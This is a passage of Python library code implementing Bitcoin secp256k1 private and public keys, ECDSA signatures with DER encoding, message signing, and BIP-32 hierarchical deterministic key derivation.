signature (Signature): A signature object.
do_hash (bool): True if the message should be hashed prior
to signing, False if not. This should always be left as
True except in special situations which require doing
the hash outside (e.g. handling Bitcoin bugs).
Returns:
verified (bool): True if the signature is verified, False
otherwise.
"""
raise NotImplementedError
def to_hex(self):
""" Hex representation of the serialized byte stream.
Returns:
h (str): A hex-encoded string.
"""
return bytes_to_str(bytes(self))
def __bytes__(self):
raise NotImplementedError
def __int__(self):
raise NotImplementedError
@property
def compressed_bytes(self):
""" Byte string corresponding to a compressed representation
of this public key.
Returns:
b (bytes): A 33-byte long byte string.
"""
raise NotImplementedError
class PrivateKey(PrivateKeyBase):
""" Encapsulation of a Bitcoin ECDSA private key.
This class provides capability to generate private keys,
obtain the corresponding public key, sign messages and
serialize/deserialize into a variety of formats.
Args:
k (int): The private key.
Returns:
PrivateKey: The object representing the private key.
"""
TESTNET_VERSION = 0xEF
MAINNET_VERSION = 0x80
@staticmethod
def from_bytes(b):
""" Generates PrivateKey from the underlying bytes.
Args:
b (bytes): A byte stream containing a 256-bit (32-byte) integer.
Returns:
PrivateKey: A PrivateKey object.
"""
if len(b) < 32:
raise ValueError('b must contain at least 32 bytes')
return PrivateKey(int.from_bytes(b[:32], 'big'))
@staticmethod
def from_hex(h):
""" Generates PrivateKey from a hex-encoded string.
Args:
h (str): A hex-encoded string containing a 256-bit
(32-byte) integer.
Returns:
PrivateKey: A PrivateKey object.
"""
return PrivateKey.from_bytes(bytes.fromhex(h))
@staticmethod
def from_int(i):
""" Initializes a private key from an integer.
Args:
i (int): Integer that is the private key.
Returns:
PrivateKey: The object representing the private key.
"""
return PrivateKey(i)
@staticmethod
def from_b58check(private_key):
""" Decodes a Base58Check encoded private-key.
Args:
private_key (str): A Base58Check encoded private key.
Returns:
PrivateKey: A PrivateKey object
"""
b58dec = base58.b58decode_check(private_key)
version = b58dec[0]
assert version in [PrivateKey.TESTNET_VERSION,
PrivateKey.MAINNET_VERSION]
return PrivateKey(int.from_bytes(b58dec[1:], 'big'))
@staticmethod
def from_random():
""" Initializes a private key from a random integer.
Returns:
PrivateKey: The object representing the private key.
"""
return PrivateKey(random.SystemRandom().randrange(1, bitcoin_curve.n))
def __init__(self, k):
self.key = k
self._public_key = None
@property
def public_key(self):
""" Returns the public key associated with this private key.
Returns:
PublicKey:
The PublicKey object that corresponds to this
private key.
"""
if self._public_key is None:
self._public_key = PublicKey.from_point(
bitcoin_curve.public_key(self.key))
return self._public_key
def raw_sign(self, message, do_hash=True):
""" Signs message using this private key.
Args:
message (bytes): The message to be signed. If a string is
provided it is assumed the encoding is 'ascii' and
converted to bytes. If this is not the case, it is up
to the caller to convert the string to bytes
appropriately and pass in the bytes.
do_hash (bool): True if the message should be hashed prior
to signing, False if not. This should always be left as
True except in special situations which require doing
the hash outside (e.g. handling Bitcoin bugs).
Returns:
ECPointAffine:
a raw point (r = pt.x, s = pt.y) which is
the signature.
"""
if isinstance(message, str):
msg = bytes(message, 'ascii')
elif isinstance(message, bytes):
msg = message
else:
raise TypeError("message must be either str or bytes!")
sig_pt, rec_id = bitcoin_curve.sign(msg, self.key, do_hash)
# Take care of large s:
# Bitcoin deals with large s, by subtracting
# s from the curve order. See:
# https://bitcointalk.org/index.php?topic=285142.30;wap2
if sig_pt.y >= (bitcoin_curve.n // 2):
sig_pt = Point(sig_pt.x, bitcoin_curve.n - sig_pt.y)
rec_id ^= 0x1
return (sig_pt, rec_id)
def sign(self, message, do_hash=True):
""" Signs message using this private key.
Note:
This differs from `raw_sign()` since it returns a Signature object.
Args:
message (bytes or str): The message to be signed. If a
string is provided it is assumed the encoding is
'ascii' and converted to bytes. If this is not the
case, it is up to the caller to convert the string to
bytes appropriately and pass in the bytes.
do_hash (bool): True if the message should be hashed prior
to signing, False if not. This should always be left as
True except in special situations which require doing
the hash outside (e.g. handling Bitcoin bugs).
Returns:
Signature: The signature corresponding to message.
"""
# Some BTC things want to have the recovery id to extract the public
# key, so we should figure that out.
sig_pt, rec_id = self.raw_sign(message, do_hash)
return Signature(sig_pt.x, sig_pt.y, rec_id)
def sign_bitcoin(self, message, compressed=False):
""" Signs a message using this private key such that it
is compatible with bitcoind, bx, and other Bitcoin
clients/nodes/utilities.
Note:
0x18 + b"Bitcoin Signed Message:" + newline + len(message) is
prepended to the message before signing.
Args:
message (bytes or str): Message to be signed.
compressed (bool): True if the corresponding public key will be
used in compressed format. False if the uncompressed version
is used.
Returns:
bytes: A Base64-encoded byte string of the signed message.
The first byte of the encoded message contains information
about how to recover the public key. In bitcoind parlance,
this is the magic number containing the recovery ID and
whether or not the key was compressed or not.
"""
if isinstance(message, str):
msg_in = bytes(message, 'ascii')
elif isinstance(message, bytes):
msg_in = message
else:
raise TypeError("message must be either str or bytes!")
msg = b"\x18Bitcoin Signed Message:\n" + bytes([len(msg_in)]) + msg_in
msg_hash = hashlib.sha256(msg).digest()
sig = self.sign(msg_hash)
comp_adder = 4 if compressed else 0
magic = 27 + sig.recovery_id + comp_adder
return base64.b64encode(bytes([magic]) + bytes(sig))
def to_b58check(self, testnet=False):
""" Generates a Base58Check encoding of this private key.
Returns:
str: A Base58Check encoded string representing the key.
"""
version = self.TESTNET_VERSION if testnet else self.MAINNET_VERSION
return base58.b58encode_check(bytes([version]) + bytes(self))
def __bytes__(self):
return self.key.to_bytes(32, 'big')
def __int__(self):
return self.key
class PublicKey(PublicKeyBase):
""" Encapsulation of a Bitcoin ECDSA public key.
This class provides a high-level API to using an ECDSA public
key, specifically for Bitcoin (secp256k1) purposes.
Args:
x (int): The x component of the public key point.
y (int): The y component of the public key point.
Returns:
PublicKey: The object representing the public key.
"""
TESTNET_VERSION = 0x6F
MAINNET_VERSION = 0x00
@staticmethod
def from_point(p):
""" Generates a public key object from any object
containing x, y coordinates.
Args:
p (Point): An object containing a two-dimensional, affine
representation of a point on the secp256k1 curve.
Returns:
PublicKey: A PublicKey object.
"""
return PublicKey(p.x, p.y)
@staticmethod
def from_int(i):
""" Generates a public key object from an integer.
Note:
This assumes that the upper 32 bytes of the integer
are the x component of the public key point and the
lower 32 bytes are the y component.
Args:
i (Bignum): A 512-bit integer representing the public
key point on the secp256k1 curve.
Returns:
PublicKey: A PublicKey object.
"""
point = ECPointAffine.from_int(bitcoin_curve, i)
return PublicKey.from_point(point)
@staticmethod
def from_base64(b64str, testnet=False):
""" Generates a public key object from a Base64 encoded string.
Args:
b64str (str): A Base64-encoded string.
testnet (bool) (Optional): If True, changes the version that
is prepended to the key.
Returns:
PublicKey: A PublicKey object.
"""
return PublicKey.from_bytes(base64.b64decode(b64str))
@staticmethod
def from_bytes(key_bytes):
""" Generates a public key object from a byte (or hex) string.
The byte stream must be of the SEC variety
(http://www.secg.org/): beginning with a single byte telling
what key representation follows. A full, uncompressed key
is represented by: 0x04 followed by 64 bytes containing
the x and y components of the point. For compressed keys
with an even y component, 0x02 is followed by 32 bytes
containing the x component. For compressed keys with an
odd y component, 0x03 is followed by 32 bytes containing
the x component.
Args:
key_bytes (bytes or str): A byte stream that conforms to the above.
Returns:
PublicKey: A PublicKey object.
"""
b = get_bytes(key_bytes)
key_bytes_len = len(b)
key_type = b[0]
if key_type == 0x04:
# Uncompressed
if key_bytes_len != 65:
raise ValueError("key_bytes must be exactly 65 bytes long when uncompressed.")
x = int.from_bytes(b[1:33], 'big')
y = int.from_bytes(b[33:65], 'big')
elif key_type == 0x02 or key_type == 0x03:
if key_bytes_len != 33:
raise ValueError("key_bytes must be exactly 33 bytes long when compressed.")
x = int.from_bytes(b[1:33], 'big')
ys = bitcoin_curve.y_from_x(x)
# Pick the one that corresponds to key_type
last_bit = key_type - 0x2
for y in ys:
if y & 0x1 == last_bit:
break
else:
return None
return PublicKey(x, y)
@staticmethod
def from_hex(h):
""" Generates a public key object from a hex-encoded string.
See from_bytes() for requirements of the hex string.
Args:
h (str): A hex-encoded string.
Returns:
PublicKey: A PublicKey object.
"""
return PublicKey.from_bytes(h)
@staticmethod
def from_signature(message, signature):
""" Attempts to create PublicKey object by deriving it
from the message and signature.
Args:
message (bytes): The message to be verified.
signature (Signature): The signature for message.
The recovery_id must not be None!
Returns:
PublicKey:
A PublicKey object derived from the
signature, if it exists. None otherwise.
"""
if signature.recovery_id is None:
raise ValueError("The signature must have a recovery_id.")
msg = get_bytes(message)
pub_keys = bitcoin_curve.recover_public_key(msg,
signature,
signature.recovery_id)
for k, recid in pub_keys:
if signature.recovery_id is not None and recid == signature.recovery_id:
return PublicKey(k.x, k.y)
return None
@staticmethod
def verify_bitcoin(message, signature, address):
""" Verifies a message signed using PrivateKey.sign_bitcoin()
or any of the bitcoin utils (e.g. bitcoin-cli, bx, etc.)
Args:
message(bytes): The message that the signature corresponds to.
signature (bytes or str): A Base64 encoded signature
address (str): Base58Check encoded address.
Returns:
bool: True if the signature verified properly, False otherwise.
"""
magic_sig = base64.b64decode(signature)
magic = magic_sig[0]
sig = Signature.from_bytes(magic_sig[1:])
sig.recovery_id = (magic - 27) & 0x3
compressed = ((magic - 27) & 0x4) != 0
# Build the message that was signed
msg = b"\x18Bitcoin Signed Message:\n" + bytes([len(message)]) + message
msg_hash = hashlib.sha256(msg).digest()
derived_public_key = PublicKey.from_signature(msg_hash, sig)
if derived_public_key is None:
raise ValueError("Could not recover public key from the provided signature.")
ver, h160 = address_to_key_hash(address)
hash160 = derived_public_key.hash160(compressed)
if hash160 != h160:
return False
return derived_public_key.verify(msg_hash, sig)
def __init__(self, x, y):
p = ECPointAffine(bitcoin_curve, x, y)
if not bitcoin_curve.is_on_curve(p):
raise ValueError("The provided (x, y) are not on the secp256k1 curve.")
self.point = p
# RIPEMD-160 of SHA-256
r = hashlib.new('ripemd160')
r.update(hashlib.sha256(bytes(self)).digest())
self.ripe = r.digest()
r = hashlib.new('ripemd160')
r.update(hashlib.sha256(self.compressed_bytes).digest())
self.ripe_compressed = r.digest()
self.keccak = sha3(bytes(self)[1:])
def hash160(self, compressed=True):
""" Return the RIPEMD-160 hash of the SHA-256 hash of the
public key.
Args:
compressed (bool): Whether or not the compressed key should
be used.
Returns:
bytes: RIPEMD-160 byte string.
"""
return self.ripe_compressed if compressed else self.ripe
def address(self, compressed=True, testnet=False):
""" Address property. In this implementation it returns the
'0x'-prefixed, hex-encoded address built from the last 20 bytes
of the sha3() (Keccak) hash of the 64-byte public key (x||y,
without the 0x04 prefix); the Base58Check/HASH160 variant is
retained below as commented-out code.
Args:
compressed (bool): Accepted for interface compatibility; not
used by the current implementation.
testnet (bool): Accepted for interface compatibility; not
used by the current implementation.
Returns:
str: A '0x'-prefixed, hex-encoded address string.
"""
version = '0x'
return version + binascii.hexlify(self.keccak[12:]).decode('ascii')
# Put the version byte in front, 0x00 for Mainnet, 0x6F for testnet
# version = bytes([self.TESTNET_VERSION]) if testnet else bytes([self.MAINNET_VERSION])
# return base58.b58encode_check(version + self.hash160(compressed))
def verify(self, message, signature, do_hash=True):
""" Verifies that message was appropriately signed.
Args:
message (bytes): The message to be verified.
signature (Signature): A signature object.
do_hash (bool): True if the message should be hashed prior
to signing, False if not. This should always be left as
True except in special situations which require doing
the hash outside (e.g. handling Bitcoin bugs).
Returns:
verified (bool): True if the signature is verified, False
otherwise.
"""
msg = get_bytes(message)
return bitcoin_curve.verify(msg, signature, self.point, do_hash)
def to_base64(self):
""" Base64 representation of the serialized byte stream.
Returns:
b (str): A Base64-encoded string.
"""
return base64.b64encode(bytes(self))
def __int__(self):
mask = 2 ** 256 - 1
return ((self.point.x & mask) << bitcoin_curve.nlen) | (self.point.y & mask)
def __bytes__(self):
return bytes(self.point)
@property
def compressed_bytes(self):
""" Byte string corresponding to a compressed representation
of this public key.
Returns:
b (bytes): A 33-byte long byte string.
"""
return self.point.compressed_bytes
class Signature(object):
""" Encapsulation of a ECDSA signature for Bitcoin purposes.
Args:
r (Bignum): r component of the signature.
s (Bignum): s component of the signature.
recovery_id (int) (Optional): Must be between 0 and 3 specifying
which of the public keys generated by the algorithm specified
in http://www.secg.org/sec1-v2.pdf Section 4.1.6 (Public Key
Recovery Operation) is the correct one for this signature.
Returns:
sig (Signature): A Signature object.
"""
@staticmethod
def from_der(der):
""" Decodes a Signature that was DER-encoded.
Args:
der (bytes or str): The DER encoding to be decoded.
Returns:
Signature: The deserialized signature.
"""
d = get_bytes(der)
# d must conform to (from btcd):
# [0 ] 0x30 - ASN.1 identifier for sequence
# [1 ] <1-byte> - total remaining length
# [2 ] 0x02 - ASN.1 identifier to specify an integer follows
# [3 ] <1-byte> - length of R
# [4.] <bytes> - R
# [..] 0x02 - ASN.1 identifier to specify an integer follows
# [..] <1-byte> - length of S
# [..] <bytes> - S
# 6 bytes + R (min. 1 byte) + S (min. 1 byte)
if len(d) < 8:
raise ValueError("DER signature string is too short.")
# 6 bytes + R (max. 33 bytes) + S (max. 33 bytes)
if len(d) > 72:
raise ValueError("DER signature string is too long.")
if d[0] != 0x30:
raise ValueError("DER signature does not start with 0x30.")
if d[1] != len(d[2:]):
raise ValueError("DER signature length incorrect.")
total_length = d[1]
if d[2] != 0x02:
raise ValueError("DER signature no 1st int marker.")
if d[3] <= 0 or d[3] > (total_length - 7):
raise ValueError("DER signature incorrect R length.")
# Grab R, check for errors
rlen = d[3]
s_magic_index = 4 + rlen
rb = d[4:s_magic_index]
if rb[0] & 0x80 != 0:
raise ValueError("DER signature R is negative.")
if len(rb) > 1 and rb[0] == 0 and rb[1] & 0x80 != 0x80:
raise ValueError("DER signature R is excessively padded.")
r = int.from_bytes(rb, 'big')
# Grab S, check for errors
if d[s_magic_index] != 0x02:
raise ValueError("DER signature no 2nd int marker.")
slen_index = s_magic_index + 1
slen = d[slen_index]
if slen <= 0 or slen > len(d) - (slen_index + 1):
raise ValueError("DER signature incorrect S length.")
sb = d[slen_index + 1:]
if sb[0] & 0x80 != 0:
raise ValueError("DER signature S is negative.")
if len(sb) > 1 and sb[0] == 0 and sb[1] & 0x80 != 0x80:
raise ValueError("DER signature S is excessively padded.")
s = int.from_bytes(sb, 'big')
if r < 1 or r >= bitcoin_curve.n:
raise ValueError("DER signature R is not between 1 and N - 1.")
if s < 1 or s >= bitcoin_curve.n:
raise ValueError("DER signature S is not between 1 and N - 1.")
return Signature(r, s)
@staticmethod
def from_base64(b64str):
""" Generates a signature object from a Base64 encoded string.
Args:
b64str (str): A Base64-encoded string.
Returns:
Signature: A Signature object.
"""
return Signature.from_bytes(base64.b64decode(b64str))
@staticmethod
def from_bytes(b):
""" Extracts the r and s components from a byte string.
Args:
b (bytes): A 64-byte long string. The first 32 bytes are
extracted as the r component and the second 32 bytes
are extracted as the s component.
Returns:
Signature: A Signature object.
Raises:
ValueError: If signature is incorrect length
"""
if len(b) != 64:
raise ValueError("from_bytes: Signature length != 64.")
r = int.from_bytes(b[0:32], 'big')
s = int.from_bytes(b[32:64], 'big')
return Signature(r, s)
@staticmethod
def from_hex(h):
""" Extracts the r and s components from a hex-encoded string.
Args:
h (str): A 64-byte (128 character) long string. The first
32 bytes are extracted as the r component and the
second 32 bytes are extracted as the s component.
Returns:
Signature: A Signature object.
"""
return Signature.from_bytes(bytes.fromhex(h))
def __init__(self, r, s, recovery_id=None):
self.r = r
self.s = s
self.recovery_id = recovery_id
@property
def x(self):
""" Convenience property for any method that requires
this object to provide a Point interface.
"""
return self.r
@property
def y(self):
""" Convenience property for any method that requires
this object to provide a Point interface.
"""
return self.s
def _canonicalize(self):
rv = []
for x in [self.r, self.s]:
# Compute minimum bytes to represent integer
bl = math.ceil(x.bit_length() / 8)
# Make sure it's at least one byte in length
if bl == 0:
bl += 1
x_bytes = x.to_bytes(bl, 'big')
# make sure there's no way it could be interpreted
# as a negative integer
if x_bytes[0] & 0x80:
x_bytes = bytes([0]) + x_bytes
rv.append(x_bytes)
return rv
def to_der(self):
""" Encodes this signature using DER
Returns:
bytes: The DER encoding of (self.r, self.s).
"""
# Output should be:
# 0x30 <length> 0x02 <length r> r 0x02 <length s> s
r, s = self._canonicalize()
total_length = 6 + len(r) + len(s)
der = bytes([0x30, total_length - 2, 0x02, len(r)]) + r + bytes([0x02, len(s)]) + s
return der
def to_hex(self):
""" Hex representation of the serialized byte stream.
Returns:
str: A hex-encoded string.
"""
return bytes_to_str(bytes(self))
def to_base64(self):
""" Base64 representation of the serialized byte stream.
Returns:
str: A Base64-encoded string.
"""
return base64.b64encode(bytes(self))
def __bytes__(self):
nbytes = math.ceil(bitcoin_curve.nlen / 8)
return self.r.to_bytes(nbytes, 'big') + self.s.to_bytes(nbytes, 'big')
class HDKey(object):
""" Base class for HDPrivateKey and HDPublicKey.
Args:
key (PrivateKey or PublicKey): The underlying simple private or
public key that is used to sign/verify.
chain_code (bytes): The chain code associated with the HD key.
depth (int): How many levels below the master node this key is. By
definition, depth = 0 for the master node.
index (int): A value between 0 and 0xffffffff indicating the child
number. Values >= 0x80000000 are considered hardened children.
parent_fingerprint (bytes): The fingerprint of the parent node. This
is 0x00000000 for the master node.
Returns:
HDKey: An HDKey object.
"""
@staticmethod
def from_b58check(key):
""" Decodes a Base58Check encoded key.
The encoding must conform to the description in:
https://github.com/bitcoin/bips/blob/master/bip-0032.mediawiki#serialization-format
Args:
key (str): A Base58Check encoded key.
Returns:
HDPrivateKey or HDPublicKey:
Either an HD private or
public key object, depending on what was serialized.
"""
return HDKey.from_bytes(base58.b58decode_check(key))
@staticmethod
def from_bytes(b):
""" Generates either a HDPrivateKey or HDPublicKey from the underlying
bytes.
The serialization must conform to the description in:
https://github.com/bitcoin/bips/blob/master/bip-0032.mediawiki#serialization-format
Args:
b (bytes): A byte stream conforming to the above.
Returns:
HDPrivateKey or HDPublicKey:
Either an HD private or
public key object, depending on what was serialized.
"""
if len(b) < 78:
raise ValueError("b must be at least 78 bytes long.")
version = int.from_bytes(b[:4], 'big')
depth = b[4]
parent_fingerprint = b[5:9]
index = int.from_bytes(b[9:13], 'big')
chain_code = b[13:45]
key_bytes = b[45:78]
rv = None
if version == HDPrivateKey.MAINNET_VERSION or version == HDPrivateKey.TESTNET_VERSION:
if key_bytes[0] != 0:
raise ValueError("First byte of private key must be 0x00!")
private_key = int.from_bytes(key_bytes[1:], 'big')
rv = HDPrivateKey(key=private_key,
chain_code=chain_code,
index=index,
depth=depth,
parent_fingerprint=parent_fingerprint)
elif version == HDPublicKey.MAINNET_VERSION or version == HDPublicKey.TESTNET_VERSION:
if key_bytes[0] != 0x02 and key_bytes[0] != 0x03:
raise ValueError("First byte of public key must be 0x02 or 0x03!")
public_key = PublicKey.from_bytes(key_bytes)
rv = HDPublicKey(x=public_key.point.x,
y=public_key.point.y,
chain_code=chain_code,
index=index,
depth=depth,
parent_fingerprint=parent_fingerprint)
else:
raise ValueError("incorrect encoding.")
return rv
@staticmethod
def from_hex(h):
""" Generates either a HDPrivateKey or HDPublicKey from the underlying
hex-encoded string.
The serialization must conform to the description in:
https://github.com/bitcoin/bips/blob/master/bip-0032.mediawiki#serialization-format
Args:
h (str): A hex-encoded string conforming to the above.
Returns:
HDPrivateKey or HDPublicKey:
Either an HD private or
public key object, depending on what was serialized.
"""
return HDKey.from_bytes(bytes.fromhex(h))
@staticmethod
def from_path(root_key, path):
p = HDKey.parse_path(path)
if p[0] == "m":
if root_key.master:
p = p[1:]
else:
raise ValueError("root_key must be a master key if 'm' is the first element of the path.")
keys = [root_key]
for i in p:
if isinstance(i, str):
hardened = i[-1] == "'"
index = int(i[:-1], 0) | 0x80000000 if hardened else int(i, 0)
else:
index = i
k = keys[-1]
klass = k.__class__
keys.append(klass.from_parent(k, index))
return keys
@staticmethod
def parse_path(path):
if isinstance(path, str):
# Remove trailing "/"
p = path.rstrip("/").split("/")
elif isinstance(path, bytes):
p = path.decode('utf-8').rstrip("/").split("/")
else:
p = list(path)
return p
@staticmethod
def path_from_indices(l):
p = []
for n in l:
if n == "m":
p.append(n)
else:
if n & 0x80000000:
_n = n & 0x7fffffff
p.append(str(_n) + "'")
else:
p.append(str(n))
return "/".join(p)
def __init__(self, key, chain_code, index, depth, parent_fingerprint):
if index < 0 or index > 0xffffffff:
raise ValueError("index is out of range: 0 <= index <= 2**32 - 1")
if not isinstance(chain_code, bytes):
raise TypeError("chain_code must be bytes")
self._key = key
self.chain_code = chain_code
self.depth = depth
self.index = index
self.parent_fingerprint = get_bytes(parent_fingerprint)
@property
def master(self):
""" Whether or not this is a master node.
Returns:
bool: True if this is a master node, False otherwise.
"""
return self.depth == 0
@property
def hardened(self):
""" Whether or not this is a hardened node.
Hardened nodes are those with indices >= 0x80000000.
Returns:
bool: True if this is hardened, False otherwise.
"""
# A hardened key is a key with index >= 2 ** 31, so
# we check that the MSB of a uint32 is set.
return self.index & 0x80000000
@property
def identifier(self):
""" Returns the identifier for the key.
A key's identifier and fingerprint are defined as:
https://github.com/bitcoin/bips/blob/master/bip-0032.mediawiki#key-identifiers
Returns:
bytes: A 20-byte RIPEMD-160 hash.
"""
raise NotImplementedError
@property
def fingerprint(self):
""" Returns the key's fingerprint, which is the first 4 bytes
of its identifier.
A key's identifier and fingerprint are defined as:
https://github.com/bitcoin/bips/blob/master/bip-0032.mediawiki#key-identifiers
Returns:
bytes: The first 4 bytes of the RIPEMD-160 hash.
"""
return self.identifier[:4]
def to_b58check(self, testnet=False):
""" Generates a Base58Check encoding of this key.
Args:
testnet (bool): True if the key is to be used with
testnet, False otherwise.
Returns:
str: A Base58Check encoded string representing the key.
"""
b = self.testnet_bytes if testnet else bytes(self)
return base58.b58encode_check(b)
def _serialize(self, testnet=False):
version = self.TESTNET_VERSION if testnet else self.MAINNET_VERSION
key_bytes = self._key.compressed_bytes if isinstance(self, HDPublicKey) else b'\x00' + bytes(self._key)
return (version.to_bytes(length=4, byteorder='big') +
bytes([self.depth]) +
self.parent_fingerprint +
self.index.to_bytes(length=4, byteorder='big') +
self.chain_code +
key_bytes)
def __bytes__(self):
return self._serialize()
@property
def testnet_bytes(self):
""" Serialization of the key for testnet.
Returns:
bytes:
A 78-byte serialization of the key, specifically for
testnet (i.e. the first 2 bytes will be 0x0435).
"""
return self._serialize(True)
class HDPrivateKey(HDKey, PrivateKeyBase):
""" Implements an HD Private Key according to BIP-0032:
https://github.com/bitcoin/bips/blob/master/bip-0032.mediawiki
For the vast majority of use cases, the 3 static functions
(HDPrivateKey.master_key_from_entropy,
HDPrivateKey.master_key_from_seed and
HDPrivateKey.from_parent) will be used rather than directly
constructing an object.
Args:
key (PrivateKey or PublicKey): The underlying simple private or
public key that is used to sign/verify.
chain_code (bytes): The chain code associated with the HD key.
depth (int): How many levels below the master node this key is. By
definition, depth = 0 for the master node.
index (int): A value between 0 and 0xffffffff indicating the child
number. Values >= 0x80000000 are considered hardened children.
parent_fingerprint (bytes): The fingerprint of the parent node. This
is 0x00000000 for the master node.
Returns:
HDKey: An HDKey object.
"""
MAINNET_VERSION = 0x0488ADE4
TESTNET_VERSION = 0x04358394
@staticmethod
def master_key_from_mnemonic(mnemonic, passphrase=''):
""" Generates a master key from a mnemonic.
Args:
mnemonic (str): The mnemonic sentence representing
the seed from which to generate the master key.
passphrase (str): Password if one was used.
Returns:
HDPrivateKey: the master private key.
"""
return HDPrivateKey.master_key_from_seed(
Mnemonic.to_seed(mnemonic, passphrase))
@staticmethod
def master_key_from_entropy(passphrase='', strength=128):
""" Generates a master key from system entropy.
Args:
strength (int): Amount of entropy desired. This should be
a multiple of 32 between 128 and 256.
passphrase (str): An optional passphrase for the generated
mnemonic string.
Returns:
HDPrivateKey, str:
a tuple consisting of the master
private key and a mnemonic string from which the seed
can be recovered.
"""
if strength % 32 != 0:
raise ValueError("strength must be a multiple of 32")
if strength < 128 or strength > 256:
raise ValueError("strength should be >= 128 and <= 256")
entropy = rand_bytes(strength // 8)
m = Mnemonic(language='english')
n = m.to_mnemonic(entropy)
return HDPrivateKey.master_key_from_seed(
Mnemonic.to_seed(n, passphrase)), n
@staticmethod
def master_key_from_seed(seed):
""" Generates a master key from a provided seed.
Args:
seed (bytes or str): a string of bytes or a hex string
Returns:
HDPrivateKey: the master private key.
"""
S = get_bytes(seed)
I = hmac.new(b"Bitcoin seed", S, hashlib.sha512).digest()
Il, Ir = I[:32], I[32:]
parse_Il = int.from_bytes(Il, 'big')
if parse_Il == 0 or parse_Il >= bitcoin_curve.n:
raise ValueError("Bad seed, resulting in invalid key!")
return HDPrivateKey(key=parse_Il, chain_code=Ir, index=0, depth=0)
@staticmethod
def from_parent(parent_key, i):
""" Derives a child private key from a parent
private key. It is not possible to derive a child
private key from a public parent key.
Args:
parent_key (HDPrivateKey): The parent private key.
i (int): The child index. Indices >= 0x80000000 derive
hardened children.
Returns:
HDPrivateKey: The child key, or None if the derived key
is invalid.
"""
if not isinstance(parent_key, HDPrivateKey):
raise TypeError("parent_key must be an HDPrivateKey object.")
hmac_key = parent_key.chain_code
if i & 0x80000000:
hmac_data = b'\x00' + bytes(parent_key._key) + i.to_bytes(length=4, byteorder='big')
else:
hmac_data = parent_key.public_key.compressed_bytes + i.to_bytes(length=4, byteorder='big')
I = hmac.new(hmac_key, hmac_data, hashlib.sha512).digest()
Il, Ir = I[:32], I[32:]
parse_Il = int.from_bytes(Il, 'big')
if parse_Il >= bitcoin_curve.n:
return None
child_key = (parse_Il + parent_key._key.key) % bitcoin_curve.n
if child_key == 0:
# Incredibly unlucky choice
return None
child_depth = parent_key.depth + 1
return HDPrivateKey(key=child_key,
chain_code=Ir,
index=i,
depth=child_depth,
parent_fingerprint=parent_key.fingerprint)
def __init__(self, key, chain_code, index, depth,
parent_fingerprint=b'\x00\x00\x00\x00'):
if index < 0 or index > 0xffffffff:
raise ValueError("index is out of range: 0 <= index <= 2**32 - 1")
private_key = PrivateKey(key)
HDKey.__init__(self, private_key, chain_code, index, depth,
parent_fingerprint)
self._public_key = None
@property
def public_key(self):
""" Returns the public key associated with this private key.
Returns:
HDPublicKey:
The HDPublicKey object that corresponds to this
private key.
"""
if self._public_key is None:
self._public_key = HDPublicKey(x=self._key.public_key.point.x,
y=self._key.public_key.point.y,
chain_code=self.chain_code,
index=self.index,
depth=self.depth,
parent_fingerprint=self.parent_fingerprint)
return self._public_key
def raw_sign(self, message, do_hash=True):
""" Signs message using the underlying non-extended private key.
Args:
message (bytes): The message to be signed. If a string is
provided it is assumed the encoding is 'ascii' and
converted to bytes. If this is not the case, it is up
to the caller to convert the string to bytes
appropriately and pass in the bytes.
do_hash (bool): True if the message should be hashed prior
to signing, False if not. This should always be left as
True except in special situations which require doing
the hash outside (e.g. handling Bitcoin bugs).
Returns:
ECPointAffine:
a raw point (r = pt.x, s = pt.y) which is
the signature.
"""
return self._key.raw_sign(message, do_hash)
def sign(self, message, do_hash=True):
""" Signs message using the underlying non-extended private key.
Note:
This differs from `raw_sign()` since it returns a Signature object.
Args:
message (bytes or str): The message to be signed. If a
string is provided it is assumed the encoding is
'ascii' and converted to bytes. If this is not the
case, it is up to the caller to convert the string to
bytes appropriately and pass in the bytes.
do_hash (bool): True if the message should be hashed prior
to signing, False if not. This should always be left as
True except in special situations which require doing
the hash outside (e.g. handling Bitcoin bugs).
Returns:
Signature: The signature corresponding to message.
"""
return self._key.sign(message, do_hash)
def sign_bitcoin(self, message, compressed=False):
""" Signs a message using the underlying non-extended private
key such that it is compatible with bitcoind, bx, and other
Bitcoin clients/nodes/utilities.
Note:
0x18 + b"Bitcoin Signed Message:" + newline + len(message) is
prepended to the message before signing.
Args:
message (bytes or str): Message to be signed.
compressed (bool):
True if the corresponding public key will be
used in compressed format. False if the uncompressed version
is used.
Returns:
bytes: A Base64-encoded byte string of the signed message.
The first byte of the encoded message contains information
about how to recover the public key. In bitcoind parlance,
this is the magic number containing the recovery ID and
whether or not the key was compressed or not. (This function
always processes full, uncompressed public-keys, so the
magic number will always be either 27 or 28).
"""
return self._key.sign_bitcoin(message, compressed)
@property
def identifier(self):
""" Returns the identifier for the key.
A key's identifier and fingerprint are defined as:
https://github.com/bitcoin/bips/blob/master/bip-0032.mediawiki#key-identifiers
In this case, it will return the RIPEMD-160 hash of the
corresponding public key.
Returns:
bytes: A 20-byte RIPEMD-160 hash.
"""
return self.public_key.hash160()
def __int__(self):
return int(self.key)
class HDPublicKey(HDKey, PublicKeyBase):
""" Implements an HD Public Key according to BIP-0032:
https://github.com/bitcoin/bips/blob/master/bip-0032.mediawiki
For the vast majority of use cases, the static function
HDPublicKey.from_parent() will be used rather than directly
constructing an object.
Args:
x (int): x component of the point representing the public key.
y (int): y component of the point representing the public key.
chain_code (bytes): The chain code associated with the HD key.
depth (int): How many levels below the master node this key is. By
definition, depth = 0 for the master node.
index (int): A value between 0 and 0xffffffff indicating the child
number. Values >= 0x80000000 are considered hardened children.
parent_fingerprint (bytes): The fingerprint of the parent node. This
is 0x00000000 for the master node.
Returns:
HDPublicKey: An HDPublicKey object.
"""
MAINNET_VERSION = 0x0488B21E
TESTNET_VERSION = 0x043587CF
@staticmethod
def from_parent(parent_key, i):
""" Derives a child public key from a parent key.
If parent_key is a private key, the child private key is derived
first and its public key is returned. Hardened children
(i >= 0x80000000) cannot be derived from a parent public key.
Args:
parent_key (HDPrivateKey or HDPublicKey): The parent key.
i (int): The child index.
Returns:
HDPublicKey: The child public key, or None if derivation fails.
"""
if isinstance(parent_key, HDPrivateKey):
# Get child private key
return HDPrivateKey.from_parent(parent_key, i).public_key
elif isinstance(parent_key, HDPublicKey):
if i & 0x80000000:
raise ValueError("Can't generate a hardened child key from a parent public key.")
else:
I = hmac.new(parent_key.chain_code,
parent_key.compressed_bytes + i.to_bytes(length=4, byteorder='big'),
hashlib.sha512).digest()
Il, Ir = I[:32], I[32:]
parse_Il = int.from_bytes(Il, 'big')
if parse_Il >= bitcoin_curve.n:
return None
temp_priv_key = PrivateKey(parse_Il)
